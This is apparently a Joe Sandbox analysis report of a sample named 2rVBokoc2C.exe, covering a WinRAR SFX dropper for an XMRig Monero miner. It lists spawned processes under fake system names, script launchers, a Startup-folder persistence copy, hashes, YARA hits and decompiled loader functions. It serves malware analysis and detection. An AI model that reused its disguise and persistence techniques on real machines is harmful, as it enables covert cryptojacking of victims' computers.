Show Windows behavior

Chronological Activities

Analysis Process: services.exePID: 6588, Parent PID: 6404

General

Target ID:	21
Start time:	19:41:02
Start date:	17/06/2022
Path:	C:\Users\user\AppData\Roaming\01Atodo\services.exe
Wow64 process (32bit):	true
Commandline:	services.exe
Imagebase:	0x710000
File size:	1955840 bytes
MD5 hash:	0C8E76FF6BA1CC33C2A37928A1E9642B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: AudioClip.exePID: 6192, Parent PID: 6404

General

Target ID:	22
Start time:	19:41:04
Start date:	17/06/2022
Path:	C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe
Wow64 process (32bit):	false
Commandline:	AudioClip.exe
Imagebase:	0xdf0000
File size:	48128 bytes
MD5 hash:	1F22C6DBDF4806A6ADB969CB6E548400
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 34%, Metadefender, Browse Detection: 88%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: timeout.exePID: 5980, Parent PID: 6404

General

Target ID:	23
Start time:	19:41:04
Start date:	17/06/2022
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 2
Imagebase:	0x830000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: wscript.exePID: 5944, Parent PID: 684

General

Target ID:	24
Start time:	19:41:05
Start date:	17/06/2022
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\start.vbs"
Imagebase:	0x7ff686190000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: wscript.exePID: 6844, Parent PID: 6404

General

Target ID:	25
Start time:	19:41:12
Start date:	17/06/2022
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\Replace32640.vbs"
Imagebase:	0x10000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 6928, Parent PID: 580

General

Target ID:	26
Start time:	19:41:13
Start date:	17/06/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff78ca80000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 7160, Parent PID: 5944

General

Target ID:	27
Start time:	19:41:16
Start date:	17/06/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\01Atodo\start.bat" "
Imagebase:	0x7ff602050000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3944, Parent PID: 7160

General

Target ID:	28
Start time:	19:41:16
Start date:	17/06/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff77f440000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000002.753918438.0000027C1CA3C000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: wscript.exePID: 6300, Parent PID: 6404

General

Target ID:	29
Start time:	19:41:17
Start date:	17/06/2022
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\mavis9080.vbe"
Imagebase:	0x10000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: wininit.exePID: 7088, Parent PID: 7160

General

Target ID:	30
Start time:	19:41:19
Start date:	17/06/2022
Path:	C:\Users\user\AppData\Roaming\01Atodo\wininit.exe
Wow64 process (32bit):	false
Commandline:	wininit.exe
Imagebase:	0x7ff690540000
File size:	5465600 bytes
MD5 hash:	606CE310D75EE688CBFFAEAE33AB4FEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001E.00000000.546097148.00007FF690D0D000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 0000001E.00000000.540071330.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp, Author: Florian Roth Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001E.00000000.540071330.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001E.00000000.540071330.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001E.00000003.549600394.000001DF76002000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20, Description: Detects XMRIG crypto coin miners, Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe, Author: Florian Roth Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe, Author: Joe Security Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 34%, Metadefender, Browse Detection: 77%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 588, Parent PID: 580

General

Target ID:	31
Start time:	19:41:20
Start date:	17/06/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff78ca80000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: AudioClip.exePID: 4772, Parent PID: 684

General

Target ID:	32
Start time:	19:41:22
Start date:	17/06/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe"
Imagebase:	0xc80000
File size:	48128 bytes
MD5 hash:	1F22C6DBDF4806A6ADB969CB6E548400
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 34%, Metadefender, Browse Detection: 88%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: cvtres.exePID: 6220, Parent PID: 6556

General

Target ID:	33
Start time:	19:41:32
Start date:	17/06/2022
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Wow64 process (32bit):	true
Commandline:	\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Imagebase:	0x400000
File size:	32912 bytes
MD5 hash:	EC0A2E5708E3FC63D01C6ABFE522C1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000021.00000002.750831813.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6564, Parent PID: 7104

General

Target ID:	34
Start time:	19:41:35
Start date:	17/06/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\01Atodo\start.bat" "
Imagebase:	0x1100000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6316, Parent PID: 6564

General

Target ID:	35
Start time:	19:41:36
Start date:	17/06/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff77f440000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000002.755329501.000002A4FF769000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: wininit.exePID: 6084, Parent PID: 6564

General

Target ID:	36
Start time:	19:41:37
Start date:	17/06/2022
Path:	C:\Users\user\AppData\Roaming\01Atodo\wininit.exe
Wow64 process (32bit):	false
Commandline:	wininit.exe
Imagebase:	0x7ff690540000
File size:	5465600 bytes
MD5 hash:	606CE310D75EE688CBFFAEAE33AB4FEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000000.548103464.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp, Author: Florian Roth Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000024.00000000.548103464.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000000.548103464.00007FF6908C4000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000000.550535309.00007FF690D0D000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: cvtres.exePID: 6584, Parent PID: 6588

General

Target ID:	38
Start time:	19:41:38
Start date:	17/06/2022
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Wow64 process (32bit):	true
Commandline:	\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Imagebase:	0x400000
File size:	32912 bytes
MD5 hash:	EC0A2E5708E3FC63D01C6ABFE522C1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: notepad.exePID: 6760, Parent PID: 6220

General

Target ID:	39
Start time:	19:41:41
Start date:	17/06/2022
Path:	C:\Windows\notepad.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\notepad.exe" -c "C:\ProgramData\eWTBqYYAek\cfg
Imagebase:	0x7ff7a5ab0000
File size:	245760 bytes
MD5 hash:	BB9A06B8F2DD9D24C77F389D7B2B58D2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 2rVBokoc2C.exePID: 7056, Parent PID: 2856COMMON

Execution Graph

Execution Coverage:	11.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.3%
Total number of Nodes:	1624
Total number of Limit Nodes:	25

Executed Functions

Function 00BBD42A Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 16%

			E00BBD42A(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a84, void* _a86, void* _a90, void* _a92, void* _a94, void* _a96, void* _a98, void* _a100, void* _a104, void* _a144, void* _a148, void* _a196) {
				char _v208;
				void* __ebx;
				void* __edi;
				void* _t41;
				void* _t42;
				long _t51;
				void* _t54;
				intOrPtr _t58;
				struct HWND__* _t74;
				void* _t75;
				WCHAR* _t94;
				struct HINSTANCE__* _t95;
				intOrPtr _t96;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t121;

				_t121 = __fp0;
				_t99 = __ebp;
				_t88 = __edx;
				E00BB002D(__edx, 1);
				E00BB9D58("C:\Users\alfons\Desktop", 0x800);
				E00BBA2B3( &_v208); // executed
				E00BB130F(0xbe71e0);
				_t74 = 0;
				E00BBF1A0(0x7104, 0xbf5b78, 0, 0x7104);
				_t102 = _t101 + 0xc;
				_t94 = GetCommandLineW();
				_t106 = _t94;
				if(_t94 != 0) {
					_push(_t94);
					E00BBBBC4(0, _t106);
					if( *0xbe9471 == 0) {
						E00BBD104(__eflags, _t94);
					} else {
						_push(__ebp);
						_t100 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
						if(_t100 != 0) {
							UnmapViewOfFile(_t75);
							_t74 = 0;
						}
						CloseHandle(_t100);
						_pop(_t99);
					}
				}
				GetModuleFileNameW(_t74, 0xbfcc88, 0x800);
				SetEnvironmentVariableW(L"sfxname", 0xbfcc88); // executed
				GetLocalTime(_t102 + 0xc);
				_push( *(_t102 + 0x1a) & 0x0000ffff);
				_push( *(_t102 + 0x1c) & 0x0000ffff);
				_push( *(_t102 + 0x1e) & 0x0000ffff);
				_push( *(_t102 + 0x20) & 0x0000ffff);
				_push( *(_t102 + 0x22) & 0x0000ffff);
				_push( *(_t102 + 0x22) & 0x0000ffff);
				E00BA3FD6(_t102 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t102 + 0x24) & 0x0000ffff);
				_t103 = _t102 + 0x28;
				SetEnvironmentVariableW(L"sfxstime", _t103 + 0x7c);
				_t95 = GetModuleHandleW(_t74);
				 *0xbdfed4 = _t95;
				 *0xbdfed0 = _t95; // executed
				_t41 = LoadIconW(_t95, 0x64); // executed
				 *0xbeb574 = _t41; // executed
				_t42 = E00BBAD3D(0xbe71e0, _t88, _t121); // executed
				 *0xbf5b74 = _t42;
				E00BAD25C(0xbdfee8, _t88, _t99, 0xbfcc88);
				E00BB87A5(0);
				E00BB87A5(0);
				 *0xbe7458 = _t103 + 0x5c;
				 *0xbe745c = _t103 + 0x30; // executed
				DialogBoxParamW(_t95, L"STARTDLG", _t74, E00BBAE20, _t74); // executed
				 *0xbe745c = _t74;
				 *0xbe7458 = _t74;
				E00BB8863(_t103 + 0x24);
				E00BB8863(_t103 + 0x50);
				_t51 =  *0xbfdc98;
				if(_t51 != 0) {
					Sleep(_t51);
				}
				if( *0xbe8468 != 0) {
					E00BBA4C4(0xbfcc88);
				}
				E00BAEA67(0xbf5a70);
				if( *0xbe7454 > 0) {
					L00BC340E( *0xbe7450);
				}
				DeleteObject( *0xbeb574);
				_t54 =  *0xbf5b74;
				if(_t54 != 0) {
					DeleteObject(_t54);
				}
				if( *0xbdff50 == 0 &&  *0xbe7447 != 0) {
					E00BA6F5B(0xbdff50, 0xff);
				}
				_t55 =  *0xbfdc9c;
				 *0xbe7447 = 1;
				if( *0xbfdc9c != 0) {
					E00BBD163(_t55);
					CloseHandle( *0xbfdc9c);
				}
				_t96 =  *0xbdff50; // 0x0
				if( *0xbfdc91 != 0) {
					_t58 =  *0xbdd5fc; // 0x3e8
					if( *0xbfdc92 == 0) {
						__eflags = _t58;
						if(_t58 < 0) {
							_t96 = _t96 - _t58;
							__eflags = _t96;
						}
					} else {
						_t96 =  *0xbfdc94;
						if(_t58 > 0) {
							_t96 = _t96 + _t58;
						}
					}
				}
				E00BBA31B(_t103 + 0x1c); // executed
				return _t96;
			}

0x00bbd42a
0x00bbd42a
0x00bbd42a
0x00bbd435
0x00bbd444
0x00bbd44d
0x00bbd457
0x00bbd461
0x00bbd46a
0x00bbd46f
0x00bbd478
0x00bbd47a
0x00bbd47c
0x00bbd47e
0x00bbd47f
0x00bbd48a
0x00bbd4f7
0x00bbd48c
0x00bbd48c
0x00bbd49f
0x00bbd4a3
0x00bbd4e4
0x00bbd4ea
0x00bbd4ea
0x00bbd4ed
0x00bbd4f3
0x00bbd4f3
0x00bbd48a
0x00bbd508
0x00bbd514
0x00bbd51f
0x00bbd52a
0x00bbd530
0x00bbd536
0x00bbd53c
0x00bbd542
0x00bbd548
0x00bbd55e
0x00bbd563
0x00bbd570
0x00bbd57d
0x00bbd582
0x00bbd588
0x00bbd58e
0x00bbd594
0x00bbd599
0x00bbd5a4
0x00bbd5a9
0x00bbd5b2
0x00bbd5bb
0x00bbd5cb
0x00bbd5da
0x00bbd5df
0x00bbd5e9
0x00bbd5ef
0x00bbd5f5
0x00bbd5fe
0x00bbd603
0x00bbd60a
0x00bbd60d
0x00bbd60d
0x00bbd61a
0x00bbd61c
0x00bbd61c
0x00bbd626
0x00bbd632
0x00bbd63a
0x00bbd63f
0x00bbd646
0x00bbd64c
0x00bbd653
0x00bbd656
0x00bbd656
0x00bbd663
0x00bbd678
0x00bbd678
0x00bbd67d
0x00bbd682
0x00bbd68b
0x00bbd68e
0x00bbd699
0x00bbd699
0x00bbd6a6
0x00bbd6ac
0x00bbd6b5
0x00bbd6ba
0x00bbd6ca
0x00bbd6cc
0x00bbd6ce
0x00bbd6ce
0x00bbd6ce
0x00bbd6bc
0x00bbd6bc
0x00bbd6c4
0x00bbd6c6
0x00bbd6c6
0x00bbd6c4
0x00bbd6ba
0x00bbd6d4
0x00bbd6e4

APIs

Part of subcall function 00BB002D: GetModuleHandleW.KERNEL32(kernel32), ref: 00BB0042
Part of subcall function 00BB002D: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00BB0054
Part of subcall function 00BB002D: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00BB0085

Part of subcall function 00BB9D58: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00BB9D60

Part of subcall function 00BBA2B3: OleInitialize.OLE32(00000000), ref: 00BBA2CC
Part of subcall function 00BBA2B3: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00BBA303
Part of subcall function 00BBA2B3: SHGetMalloc.SHELL32(00BE7430), ref: 00BBA30D

Part of subcall function 00BB130F: GetCPInfo.KERNEL32(00000000,?), ref: 00BB1320
Part of subcall function 00BB130F: IsDBCSLeadByte.KERNEL32(00000000), ref: 00BB1334

GetCommandLineW.KERNEL32 ref: 00BBD472
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00BBD499
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00BBD4AA
UnmapViewOfFile.KERNEL32(00000000), ref: 00BBD4E4

Part of subcall function 00BBD104: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00BBD11A
Part of subcall function 00BBD104: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00BBD156

CloseHandle.KERNEL32(00000000), ref: 00BBD4ED
GetModuleFileNameW.KERNEL32(00000000,00BFCC88,00000800), ref: 00BBD508
SetEnvironmentVariableW.KERNELBASE(sfxname,00BFCC88), ref: 00BBD514
GetLocalTime.KERNEL32(?), ref: 00BBD51F
_swprintf.LIBCMT ref: 00BBD55E
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00BBD570
GetModuleHandleW.KERNEL32(00000000), ref: 00BBD577
LoadIconW.USER32(00000000,00000064), ref: 00BBD58E
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AE20,00000000), ref: 00BBD5DF
Sleep.KERNEL32(?), ref: 00BBD60D
DeleteObject.GDI32 ref: 00BBD646
DeleteObject.GDI32(?), ref: 00BBD656
CloseHandle.KERNEL32 ref: 00BBD699

Strings

STARTDLG, xrefs: 00BBD5D4
C:\Users\user\Desktop, xrefs: 00BBD43F
sfxname, xrefs: 00BBD50F
sfxstime, xrefs: 00BBD56B
winrarsfxmappingfile.tmp, xrefs: 00BBD48D
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00BBD54F

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 788466649-2656992072
Opcode ID: 86cc4e1d83053e5d671182ad5f0f759c4e659c0f9b5595d528e7266937424889
Instruction ID: 0546ed9b49e269379e1f93c559bb65c36333b43dc847a8fee42353fad6d77fb9
Opcode Fuzzy Hash: 86cc4e1d83053e5d671182ad5f0f759c4e659c0f9b5595d528e7266937424889
Instruction Fuzzy Hash: 6B61C571904285AFD320AB65EC89FBB7BECEB44700F0444A6F549972A2FFF88944C761

Uniqueness

Uniqueness Score: -1.00%

Function 00BB9D9A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E00BB9D9A(WCHAR* _a4) {
				char _v4;
				char _v8;
				char _v20;
				intOrPtr* _v28;
				void* __ecx;
				struct HRSRC__* _t14;
				char _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				intOrPtr* _t26;
				char* _t33;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				long _t44;
				intOrPtr* _t46;
				struct HRSRC__* _t47;

				_t14 = FindResourceW( *0xbdfed0, _a4, "PNG");
				_t47 = _t14;
				if(_t47 == 0) {
					return _t14;
				}
				_t44 = SizeofResource( *0xbdfed0, _t47);
				if(_t44 == 0) {
					L4:
					_t16 = 0;
					L16:
					return _t16;
				}
				_t17 = LoadResource( *0xbdfed0, _t47);
				if(_t17 == 0) {
					goto L4;
				}
				_t18 = LockResource(_t17);
				_t48 = _t18;
				if(_t18 != 0) {
					_v4 = 0;
					_t19 = GlobalAlloc(2, _t44); // executed
					_t35 = _t19;
					if(_t35 == 0) {
						L15:
						_t16 = _v4;
						goto L16;
					}
					if(GlobalLock(_t35) == 0) {
						L14:
						GlobalFree(_t35);
						goto L15;
					}
					E00BBF300(_t20, _t48, _t44);
					_v8 = 0;
					_push( &_v8);
					_push(0);
					_push(_t35);
					if( *0xc01178() == 0) {
						_t26 = E00BB9D2F(_t24, _t37, _v20, 0); // executed
						_t38 = _v28;
						_t46 = _t26;
						 *0xbd2260(_t38);
						 *((intOrPtr*)( *((intOrPtr*)( *_t38 + 8))))();
						if(_t46 != 0) {
							 *((intOrPtr*)(_t46 + 8)) = 0;
							if( *((intOrPtr*)(_t46 + 8)) == 0) {
								_push(0xffffff);
								_t33 =  &_v20;
								_push(_t33);
								_push( *((intOrPtr*)(_t46 + 4)));
								L00BBE08E(); // executed
								if(_t33 != 0) {
									 *((intOrPtr*)(_t46 + 8)) = _t33;
								}
							}
							 *0xbd2260(1);
							 *((intOrPtr*)( *((intOrPtr*)( *_t46))))();
						}
					}
					GlobalUnlock(_t35);
					goto L14;
				}
				goto L4;
			}

0x00bb9dac
0x00bb9db2
0x00bb9db6
0x00bb9eb0
0x00bb9eb0
0x00bb9dca
0x00bb9dce
0x00bb9dee
0x00bb9dee
0x00bb9eac
0x00000000
0x00bb9eac
0x00bb9dd7
0x00bb9ddf
0x00000000
0x00000000
0x00bb9de2
0x00bb9de8
0x00bb9dec
0x00bb9dfc
0x00bb9e00
0x00bb9e06
0x00bb9e0a
0x00bb9ea6
0x00bb9ea6
0x00000000
0x00bb9eab
0x00bb9e19
0x00bb9e9f
0x00bb9ea0
0x00000000
0x00bb9ea0
0x00bb9e22
0x00bb9e2a
0x00bb9e32
0x00bb9e33
0x00bb9e34
0x00bb9e3d
0x00bb9e44
0x00bb9e49
0x00bb9e4d
0x00bb9e57
0x00bb9e5d
0x00bb9e61
0x00bb9e66
0x00bb9e6b
0x00bb9e6d
0x00bb9e72
0x00bb9e76
0x00bb9e77
0x00bb9e7a
0x00bb9e81
0x00bb9e83
0x00bb9e83
0x00bb9e81
0x00bb9e8e
0x00bb9e96
0x00bb9e96
0x00bb9e61
0x00bb9e99
0x00000000
0x00bb9e99
0x00000000

APIs

FindResourceW.KERNEL32(00BBAD89,PNG,?,?,?,00BBAD89,00000066), ref: 00BB9DAC
SizeofResource.KERNEL32(00000000,00000000,?,?,?,00BBAD89,00000066), ref: 00BB9DC4
LoadResource.KERNEL32(00000000,?,?,?,00BBAD89,00000066), ref: 00BB9DD7
LockResource.KERNEL32(00000000,?,?,?,00BBAD89,00000066), ref: 00BB9DE2
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00BBAD89,00000066), ref: 00BB9E00
GlobalLock.KERNEL32 ref: 00BB9E11
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00BB9E7A
GlobalUnlock.KERNEL32(00000000), ref: 00BB9E99
GlobalFree.KERNEL32 ref: 00BB9EA0

Strings

PNG, xrefs: 00BB9D9D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
String ID: PNG
API String ID: 4097654274-364855578
Opcode ID: fff04bd832c4d4e3673a7ddd7ae486e82335501972e8c6084904a29c886d2d2b
Instruction ID: 38201e1423bd5cfc7255813485ff12221b75b53a9c506a21f540130b79f720a5
Opcode Fuzzy Hash: fff04bd832c4d4e3673a7ddd7ae486e82335501972e8c6084904a29c886d2d2b
Instruction Fuzzy Hash: C2318D71605706AFC7119F22DC5997BFBE9FF95750B04496AFA0593220EFB1DC04CA60

Uniqueness

Uniqueness Score: -1.00%

Function 00BAA534 Relevance: 7.6, APIs: 5, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00BAA534(void* __edx, intOrPtr _a4, intOrPtr _a8, char _a32, short _a592, void* _a4692, WCHAR* _a4696, intOrPtr _a4700) {
				struct _WIN32_FIND_DATAW _v0;
				char _v4;
